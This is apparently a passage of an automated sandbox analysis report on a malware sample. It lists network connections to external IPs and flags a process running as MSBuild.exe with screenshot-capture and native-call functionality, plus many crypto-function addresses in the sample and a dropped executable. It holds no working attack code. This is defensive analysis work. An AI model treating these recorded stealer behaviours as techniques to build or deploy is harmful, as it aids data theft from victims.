Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49901 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49924 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49947 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49969 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49913 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49942
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49941
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49940
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49939
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49938
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49937
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49936
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49935
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 49902 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49934
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49933
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49932
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49931
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49930
Source: unknown	Network traffic detected: HTTP traffic on port 49925 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49971 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49936 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49876 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49960 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49929
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49928
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49927
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49926
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49925

Source: unknown	HTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.7:49807 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49843 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.7:49875 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.7:49987 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:49990 version: TLS 1.2

Contains functionality to record screenshots

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 5_2_00411F2A CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,

5_2_00411F2A

Contains functionality to call native functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 5_2_0040145B GetCurrentProcess,NtQueryInformationProcess,

5_2_0040145B

Detected potential crypto function

Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_00352021	4_2_00352021
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_003AA22B	4_2_003AA22B
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_0035729C	4_2_0035729C
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_0036D39B	4_2_0036D39B
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_0039E3DF	4_2_0039E3DF
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_003994DB	4_2_003994DB
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_00396570	4_2_00396570
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_003AA5C9	4_2_003AA5C9
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_0036572C	4_2_0036572C
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_0039877B	4_2_0039877B
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_003AA99B	4_2_003AA99B
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_0035CAF2	4_2_0035CAF2
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_0036BB36	4_2_0036BB36
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_00363C92	4_2_00363C92
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_00351D79	4_2_00351D79
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_003A9D96	4_2_003A9D96
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_003AAD83	4_2_003AAD83
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_0035FEF0	4_2_0035FEF0
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_00359F96	4_2_00359F96
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_0041B8A3	5_2_0041B8A3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_0042DAC3	5_2_0042DAC3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_0042D353	5_2_0042D353
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_0041C603	5_2_0041C603
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_0042D6F1	5_2_0042D6F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_00419698	5_2_00419698
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_0042DEAB	5_2_0042DEAB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_0042CEBE	5_2_0042CEBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D398D20	5_2_6D398D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2DED70	5_2_6D2DED70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D33AD50	5_2_6D33AD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D214DB0	5_2_6D214DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2A6D90	5_2_6D2A6D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D39CDC0	5_2_6D39CDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2EAC30	5_2_6D2EAC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2D6C00	5_2_6D2D6C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D21AC60	5_2_6D21AC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D20ECC0	5_2_6D20ECC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D26ECD0	5_2_6D26ECD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D350F20	5_2_6D350F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D216F10	5_2_6D216F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2D2F70	5_2_6D2D2F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D27EF40	5_2_6D27EF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D358FB0	5_2_6D358FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D21EFB0	5_2_6D21EFB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D210FE0	5_2_6D210FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2EEFF0	5_2_6D2EEFF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2F0E20	5_2_6D2F0E20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2AEE70	5_2_6D2AEE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D296E90	5_2_6D296E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D21AEC0	5_2_6D21AEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2B0EC0	5_2_6D2B0EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D266900	5_2_6D266900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D248960	5_2_6D248960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2A09A0	5_2_6D2A09A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2CA9A0	5_2_6D2CA9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2D09B0	5_2_6D2D09B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D32C9E0	5_2_6D32C9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2449F0	5_2_6D2449F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D260820	5_2_6D260820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D29A820	5_2_6D29A820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2E4840	5_2_6D2E4840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D3168E0	5_2_6D3168E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2B0BA0	5_2_6D2B0BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D316BE0	5_2_6D316BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2C8A30	5_2_6D2C8A30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2BEA00	5_2_6D2BEA00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D28CA70	5_2_6D28CA70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D28EA80	5_2_6D28EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D272560	5_2_6D272560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2B0570	5_2_6D2B0570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D358550	5_2_6D358550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D268540	5_2_6D268540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D314540	5_2_6D314540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2045B0	5_2_6D2045B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2DA5E0	5_2_6D2DA5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D29E5F0	5_2_6D29E5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D274420	5_2_6D274420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D29A430	5_2_6D29A430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D228460	5_2_6D228460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D33A480	5_2_6D33A480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2564D0	5_2_6D2564D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2AA4D0	5_2_6D2AA4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D290700	5_2_6D290700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D23A7D0	5_2_6D23A7D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D26C650	5_2_6D26C650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D26E6E0	5_2_6D26E6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2AE6E0	5_2_6D2AE6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2346D0	5_2_6D2346D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D286130	5_2_6D286130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2F4130	5_2_6D2F4130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D278140	5_2_6D278140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2101E0	5_2_6D2101E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2DC000	5_2_6D2DC000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2D8010	5_2_6D2D8010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D25E070	5_2_6D25E070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2200B0	5_2_6D2200B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2EC0B0	5_2_6D2EC0B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D208090	5_2_6D208090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D282320	5_2_6D282320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D352370	5_2_6D352370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D212370	5_2_6D212370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D32C360	5_2_6D32C360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2A6370	5_2_6D2A6370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D218340	5_2_6D218340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2423A0	5_2_6D2423A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D26E3B0	5_2_6D26E3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2643E0	5_2_6D2643E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2E8220	5_2_6D2E8220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2DA210	5_2_6D2DA210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D298260	5_2_6D298260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2A8250	5_2_6D2A8250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2E22A0	5_2_6D2E22A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2DE2B0	5_2_6D2DE2B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D3962C0	5_2_6D3962C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D273D00	5_2_6D273D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D203D80	5_2_6D203D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D359D90	5_2_6D359D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2E1DC0	5_2_6D2E1DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D221C30	5_2_6D221C30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D213C40	5_2_6D213C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D339C40	5_2_6D339C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2AFC80	5_2_6D2AFC80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2D1CE0	5_2_6D2D1CE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D34DCD0	5_2_6D34DCD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D245F20	5_2_6D245F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D205F30	5_2_6D205F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D367F20	5_2_6D367F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D231F90	5_2_6D231F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2BBFF0	5_2_6D2BBFF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D32DFC0	5_2_6D32DFC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D393FC0	5_2_6D393FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D31DE10	5_2_6D31DE10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D36BE70	5_2_6D36BE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D395E60	5_2_6D395E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D233EC0	5_2_6D233EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2C5920	5_2_6D2C5920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D35F900	5_2_6D35F900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D28F960	5_2_6D28F960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2CD960	5_2_6D2CD960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D221980	5_2_6D221980
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2E1990	5_2_6D2E1990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2759F0	5_2_6D2759F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2A79F0	5_2_6D2A79F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2A99C0	5_2_6D2A99C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2499D0	5_2_6D2499D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D26D810	5_2_6D26D810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D21D8E0	5_2_6D21D8E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2438E0	5_2_6D2438E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D36B8F0	5_2_6D36B8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2EF8F0	5_2_6D2EF8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2AF8C0	5_2_6D2AF8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D25BB20	5_2_6D25BB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2EFB60	5_2_6D2EFB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D269BA0	5_2_6D269BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2D9BB0	5_2_6D2D9BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D201B80	5_2_6D201B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2F5B90	5_2_6D2F5B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D257BF0	5_2_6D257BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D30DA30	5_2_6D30DA30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D24FA10	5_2_6D24FA10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2B1A10	5_2_6D2B1A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D399A50	5_2_6D399A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2EDAB0	5_2_6D2EDAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D211AE0	5_2_6D211AE0
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_002D2021	15_2_002D2021
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_00302088	15_2_00302088
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_003040C8	15_2_003040C8
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_0032E132	15_2_0032E132
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_00302123	15_2_00302123
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_0032E1A8	15_2_0032E1A8
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_002FE1CF	15_2_002FE1CF
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_00308278	15_2_00308278
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_002FE27B	15_2_002FE27B
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_002FE272	15_2_002FE272
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_002FE455	15_2_002FE455
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_00300488	15_2_00300488
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_002FE527	15_2_002FE527
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_0032E738	15_2_0032E738
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_00338798	15_2_00338798
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_00344988	15_2_00344988
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_0031AA47	15_2_0031AA47
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_002DCAF2	15_2_002DCAF2
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_00304AC8	15_2_00304AC8
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_00306D40	15_2_00306D40
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_0032AD84	15_2_0032AD84
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_00308D88	15_2_00308D88
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_00344E98	15_2_00344E98
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_00340F18	15_2_00340F18
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_0030EF08	15_2_0030EF08
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_00346FA8	15_2_00346FA8
